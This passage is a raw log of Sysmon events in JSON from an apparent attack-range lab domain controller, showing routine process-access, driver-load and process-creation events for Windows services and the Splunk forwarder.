C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1776\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1776","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":3793,"ProcessID":2740,"ThreadID":3448,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.110\r\nImageLoaded: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nHashes: MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB\r\nSigned: true\r\nSignature: Riverbed Technology, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.110","ImageLoaded":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Hashes":"MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB","Signed":"true","Signature":"Riverbed Technology, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nProcessGuid: {A837DB8D-0242-5F25-0000-001099C90500}\r\nProcessId: 2272\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","ProcessGuid":"{A837DB8D-0242-5F25-0000-001099C90500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 